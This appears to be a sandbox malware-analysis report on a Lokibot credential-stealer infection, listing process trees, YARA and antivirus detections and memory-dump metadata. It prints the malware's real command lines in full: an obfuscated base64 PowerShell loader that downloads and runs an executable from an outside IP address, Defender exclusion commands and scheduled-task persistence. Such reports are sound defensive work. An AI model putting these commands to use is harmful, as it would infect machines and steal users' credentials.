                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:01:56:49
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                                                                    Imagebase:0x170000
                                                                    File size:427'008 bytes
                                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:14
                                                                    Start time:01:56:49
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                                                                    Imagebase:0x170000
                                                                    File size:427'008 bytes
                                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:16
                                                                    Start time:01:56:49
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp"
                                                                    Imagebase:0x620000
                                                                    File size:179'712 bytes
                                                                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:18
                                                                    Start time:01:56:50
                                                                    Start date:20/11/2024
                                                                    Path:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\caspol.exe"
                                                                    Imagebase:0xec0000
                                                                    File size:600'576 bytes
                                                                    MD5 hash:74061922F1E78C237A66D12A15A18181
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000012.00000002.637368812.0000000000874000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    Target ID:19
                                                                    Start time:01:56:52
                                                                    Start date:20/11/2024
                                                                    Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                                                                    Imagebase:0x1260000
                                                                    File size:2'525'680 bytes
                                                                    MD5 hash:2F8D93826B8CBF9290BC57535C7A6817
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:20
                                                                    Start time:01:56:56
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\System32\taskeng.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:taskeng.exe {819EB824-4817-4048-BBF5-A7A0A0C35676} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                                    Imagebase:0xff6a0000
                                                                    File size:464'384 bytes
                                                                    MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:21
                                                                    Start time:01:56:56
                                                                    Start date:20/11/2024
                                                                    Path:C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                                                                    Imagebase:0x10f0000
                                                                    File size:600'576 bytes
                                                                    MD5 hash:74061922F1E78C237A66D12A15A18181
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Has exited:true

                                                                    Target ID:22
                                                                    Start time:01:57:00
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                                                                    Imagebase:0x40000
                                                                    File size:427'008 bytes
                                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:23
                                                                    Start time:01:57:01
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                                                                    Imagebase:0x40000
                                                                    File size:427'008 bytes
                                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:26
                                                                    Start time:01:57:03
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpDCB9.tmp"
                                                                    Imagebase:0x690000
                                                                    File size:179'712 bytes
                                                                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:28
                                                                    Start time:01:57:04
                                                                    Start date:20/11/2024
                                                                    Path:C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                                                                    Imagebase:0x10f0000
                                                                    File size:600'576 bytes
                                                                    MD5 hash:74061922F1E78C237A66D12A15A18181
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Loki_1, Description: Loki Payload, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Has exited:true

                                                                    Target ID:29
                                                                    Start time:01:57:05
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\System32\mshta.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                    Imagebase:0x13fe20000
                                                                    File size:13'824 bytes
                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:31
                                                                    Start time:01:57:11
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
                                                                    Imagebase:0x13f570000
                                                                    File size:443'392 bytes
                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:33
                                                                    Start time:01:57:11
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
                                                                    Imagebase:0x13f570000
                                                                    File size:443'392 bytes
                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:34
                                                                    Start time:01:57:14
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline"
                                                                    Imagebase:0x13fc20000
                                                                    File size:2'758'280 bytes
                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:35
                                                                    Start time:01:57:14
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0AA.tmp" "c:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP"
                                                                    Imagebase:0x13f180000
                                                                    File size:52'744 bytes
                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:37
                                                                    Start time:01:57:18
                                                                    Start date:20/11/2024
                                                                    Path:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\caspol.exe"
                                                                    Imagebase:0x10e0000
                                                                    File size:600'576 bytes
                                                                    MD5 hash:74061922F1E78C237A66D12A15A18181
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Has exited:true

                                                                    Target ID:38
                                                                    Start time:01:57:18
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                                                                    Imagebase:0xbb0000
                                                                    File size:427'008 bytes
                                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:40
                                                                    Start time:01:57:19
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                                                                    Imagebase:0xbb0000
                                                                    File size:427'008 bytes
                                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:42
                                                                    Start time:01:57:19
                                                                    Start date:20/11/2024
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp1F44.tmp"
                                                                    Imagebase:0x250000
                                                                    File size:179'712 bytes
                                                                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:44
                                                                    Start time:01:57:22
                                                                    Start date:20/11/2024
                                                                    Path:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\caspol.exe"
                                                                    Imagebase:0x10e0000
                                                                    File size:600'576 bytes
                                                                    MD5 hash:74061922F1E78C237A66D12A15A18181
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Call Graph

                                                                    • Entrypoint
                                                                    • Decryption Function
                                                                    • Executed
                                                                    • Not Executed
                                                                    • Show Help
                                                                    callgraph 1 Error: Graph is empty

                                                                    Module: Sheet1

                                                                    Declaration
                                                                    LineContent
                                                                    1

                                                                    Attribute VB_Name = "Sheet1"

                                                                    2

                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                    3

                                                                    Attribute VB_GlobalNameSpace = False

                                                                    4

                                                                    Attribute VB_Creatable = False

                                                                    5

                                                                    Attribute VB_PredeclaredId = True

                                                                    6

                                                                    Attribute VB_Exposed = True

                                                                    7

                                                                    Attribute VB_TemplateDerived = False

                                                                    8

                                                                    Attribute VB_Customizable = True

                                                                    Module: Sheet2

                                                                    Declaration
                                                                    LineContent
                                                                    1

                                                                    Attribute VB_Name = "Sheet2"

                                                                    2

                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                    3

                                                                    Attribute VB_GlobalNameSpace = False

                                                                    4

                                                                    Attribute VB_Creatable = False

                                                                    5

                                                                    Attribute VB_PredeclaredId = True

                                                                    6

                                                                    Attribute VB_Exposed = True

                                                                    7

                                                                    Attribute VB_TemplateDerived = False

                                                                    8

                                                                    Attribute VB_Customizable = True

                                                                    Module: Sheet3

                                                                    Declaration
                                                                    LineContent
                                                                    1

                                                                    Attribute VB_Name = "Sheet3"

                                                                    2

                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                    3

                                                                    Attribute VB_GlobalNameSpace = False

                                                                    4

                                                                    Attribute VB_Creatable = False

                                                                    5

                                                                    Attribute VB_PredeclaredId = True

                                                                    6

                                                                    Attribute VB_Exposed = True

                                                                    7

                                                                    Attribute VB_TemplateDerived = False

                                                                    8

                                                                    Attribute VB_Customizable = True

                                                                    Module: ThisWorkbook

                                                                    Declaration
                                                                    LineContent
                                                                    1

                                                                    Attribute VB_Name = "ThisWorkbook"

                                                                    2

                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                    3

                                                                    Attribute VB_GlobalNameSpace = False

                                                                    4

                                                                    Attribute VB_Creatable = False

                                                                    5

                                                                    Attribute VB_PredeclaredId = True

                                                                    6

                                                                    Attribute VB_Exposed = True

                                                                    7

                                                                    Attribute VB_TemplateDerived = False

                                                                    8

                                                                    Attribute VB_Customizable = True

                                                                    Reset < >
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.430492158.00000000035F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_35f0000_mshta.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                      • Instruction ID: 8d859bd0f90cf432f5a6d8828943b7b0fa2382a58c00d2892dcb8f6fc4f96a2d
                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                      • Instruction Fuzzy Hash:
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.430492158.00000000035F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_35f0000_mshta.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                      • Instruction ID: 8d859bd0f90cf432f5a6d8828943b7b0fa2382a58c00d2892dcb8f6fc4f96a2d
                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                      • Instruction Fuzzy Hash:
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.430492158.00000000035F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_35f0000_mshta.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                      • Instruction ID: 8d859bd0f90cf432f5a6d8828943b7b0fa2382a58c00d2892dcb8f6fc4f96a2d
                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                      • Instruction Fuzzy Hash:
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.430492158.00000000035F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_35f0000_mshta.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                      • Instruction ID: 8d859bd0f90cf432f5a6d8828943b7b0fa2382a58c00d2892dcb8f6fc4f96a2d
                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                      • Instruction Fuzzy Hash:

                                                                      Execution Graph

                                                                      Execution Coverage:5%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:50%
                                                                      Total number of Nodes:6
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 2417 7fe891a4b18 2419 7fe891a5a30 URLDownloadToFileW 2417->2419 2420 7fe891a5b00 2419->2420 2413 7fe891a59e1 2414 7fe891a59f1 URLDownloadToFileW 2413->2414 2416 7fe891a5b00 2414->2416

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.475431294.000007FE891A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE891A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7fe891a0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID: DownloadFile
                                                                      • String ID:
                                                                      • API String ID: 1407266417-0
                                                                      • Opcode ID: e9858a590bb1ad5908b8d94a8f69db2028c05f584d8bb7707eb6ef8eb2b065e1
                                                                      • Instruction ID: 1254ffba3495300d965ee62da69c98b9a65ee41ce28f925c3bc24e8a14379329
                                                                      • Opcode Fuzzy Hash: e9858a590bb1ad5908b8d94a8f69db2028c05f584d8bb7707eb6ef8eb2b065e1
